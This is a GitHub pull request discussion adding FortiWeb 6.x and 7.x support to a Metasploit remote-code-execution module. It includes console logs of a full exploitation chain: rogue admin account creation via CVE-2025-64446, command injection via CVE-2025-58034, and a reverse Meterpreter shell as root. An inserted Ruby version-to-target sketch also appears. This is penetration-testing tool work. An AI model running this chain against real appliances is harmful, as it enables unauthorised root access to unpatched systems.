Conversation

Contributor
@sfewer-r7 sfewer-r7 commented Nov 27, 2025

Overview

This pull request updates the exploit/linux/http/fortinet_fortiweb_rce module (added in #20717) to add support for older versions of FortiWeb, versions 6.*, which are no longer under support from the vendor (so no patches available AFAIK), but are also vulnerable to this exploit chain.

To do this, the module now has two targets: FortiWeb 8.x (set target 0) and FortiWeb 7.x and 6.x (set target 1). This is required as exploitation differs between major versions as follows:

  • On 6.* and 7.* both the Unix and Linux payloads work (like a fetch-based native Meterpreter).
  • On 8.* the Unix payloads do work, but the Linux payloads do not, as the Linux Integrity Measurement Architecture (IMA) appraisal feature is present (see here for some discussion).

As different payload platforms can be used, it makes sense to split this out into two targets.

Additionally, the mechanism to trigger the command injection is via the CLI, and how we target the CLI differs between 6.* and 8.*/7.*.

The module will now version-fingerprint the target before exploiting the command injection, to make sure the selected Metasploit target supports the actual remote appliance version.

The exploit module has now been verified to work successfully against 8.0.1, 7.4.8, 6.4.3, and 6.3.9.

Example against FortiWeb 6.3.9

msf exploit(linux/http/fortinet_fortiweb_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Creating a new admin account via CVE-2025-64446...
[+] New admin account successfully created: oren_hessel:BtNLqzMt
[*] Logging in...
[+] Successfully logged in as oren_hessel
[+] Detected target version: 6.3.9
[*] Executing payload via CVE-2025-58034...
[*] Uploading bootstrap payload chunk 1 of 7...
[*] Uploading bootstrap payload chunk 2 of 7...
[*] Uploading bootstrap payload chunk 3 of 7...
[*] Uploading bootstrap payload chunk 4 of 7...
[*] Uploading bootstrap payload chunk 5 of 7...
[*] Uploading bootstrap payload chunk 6 of 7...
[*] Amalgamating bootstrap payload chunks...
[*] Executing bootstrap payload...
[+] Finished.
[*] Meterpreter session 4 opened (192.168.86.122:4444 -> 192.168.86.204:23094) at 2025-11-27 12:17:30 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.204
OS           :  (Linux 5.4.0)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 9873 created.
Channel 1 created.
id      
uid=0(root) gid=0
cli admin console
FortiWeb # get system status
International Version: FortiWeb-HyperV 6.39,build1117(GA),201125

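Added example, not code from this PR or from the module itself: a Ruby sketch of the version-to-target gate the overview describes (and that the later `show targets` output reflects). Everything in it is an assumption for illustration: the `TARGETS` table, the function names, and the `[:ok | :abort, message]` return convention. The module's real fingerprinting request and its Metasploit target plumbing are not reproduced here.

```ruby
require 'rubygems' # Gem::Version is provided by RubyGems (loaded by default on modern Ruby)

# Hypothetical target table mirroring what the PR describes: two targets,
# each with the major versions it covers and the payload platforms that work.
# Target 0 (8.x) is Unix-only: IMA appraisal on 8.x blocks the dropped,
# unsigned Linux ELF payloads, while Unix (command) payloads still run.
# Target 1 (7.x/6.x) accepts both Unix and Linux payloads.
TARGETS = [
  { id: 0, name: 'FortiWeb 8.x',         majors: [8],    platforms: %w[unix] },
  { id: 1, name: 'FortiWeb 7.x and 6.x', majors: [7, 6], platforms: %w[unix linux] },
].freeze

# Parse a dotted numeric version string such as "6.3.9" or "8.0.1".
# Returns nil for anything else so callers can abort instead of guessing.
def parse_version(str)
  return nil unless str.is_a?(String) && str.match?(/\A\d+(\.\d+)*\z/)
  Gem::Version.new(str)
end

# Return the target entry covering the given version, or nil when no target
# does (e.g. an unparsable banner or a future major version).
def target_for_version(version_str)
  version = parse_version(version_str)
  return nil unless version
  major = version.segments.first
  TARGETS.find { |t| t[:majors].include?(major) }
end

# Gate run after fingerprinting and before firing the command injection:
# the operator-selected target must be the one covering the detected version.
# Returns [:ok, message] or [:abort, message] so the caller can fail cleanly.
def check_target(selected_id, version_str)
  expected = target_for_version(version_str)
  return [:abort, "Unsupported or unrecognised version: #{version_str.inspect}"] unless expected

  if expected[:id] == selected_id
    [:ok, "Detected target version: #{version_str}"]
  else
    [:abort, "Detected version #{version_str} needs target #{expected[:id]} " \
             "(#{expected[:name]}), but target #{selected_id} is selected"]
  end
end

# Whether a payload platform ("unix" or "linux") is usable on a given target.
def payload_allowed?(target_id, platform)
  t = TARGETS.find { |x| x[:id] == target_id }
  !t.nil? && t[:platforms].include?(platform.to_s.downcase)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample versions: the four the PR reports as verified, plus
  # an unsupported major and an unparsable banner.
  ['8.0.1', '7.4.8', '6.4.3', '6.3.9', '9.0.0', 'garbage'].each do |v|
    t = target_for_version(v)
    puts "#{v.ljust(8)} -> #{t ? "target #{t[:id]} (#{t[:name]})" : 'no target'}"
  end
  p check_target(1, '6.3.9')
  p check_target(0, '6.3.9')
  p payload_allowed?(0, 'linux')
end
```

The point of `check_target` returning `:abort` rather than silently remapping the target is that a 6.x appliance driven with the 8.x target (or vice versa) would use the wrong CLI path for the injection, so the safer behaviour is to stop and tell the operator which target to `set`.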
…, but no longer under support from the vendor.
@sfewer-r7 sfewer-r7 marked this pull request as draft November 27, 2025 15:02
Contributor Author

Also tested successfully against 6.4.3:

[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.205:39760) at 2025-11-27 15:32:49 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.205
OS           :  (Linux 5.4.0)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 20143 created.
Channel 1 created.
id
uid=0(root) gid=0
cli admin console
FortiWeb # get system status
International Version: FortiWeb-HyperV 6.43,build1489(GA),230602

Contributor Author

Commit 0143128 gets both Unix and Linux payloads working on 6.* targets. I want to test this all more before I move out of Draft.

….x also, so this target is Unix and Linux. This leaves the 8.x target Unix only due to IMA appraisal.
Contributor Author

Commit 795c38c combines the 7.* target with the 6.* target, as both Linux and Unix payloads work against those versions. So now the module has this:

msf exploit(linux/http/fortinet_fortiweb_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   FortiWeb 8.x
    1   FortiWeb 7.x and 6.x


msf exploit(linux/http/fortinet_fortiweb_rce) >

This has now been confirmed to work against 8.0.1, 7.4.8, 6.4.3, and 6.3.9.

@sfewer-r7 sfewer-r7 marked this pull request as ready for review November 28, 2025 10:19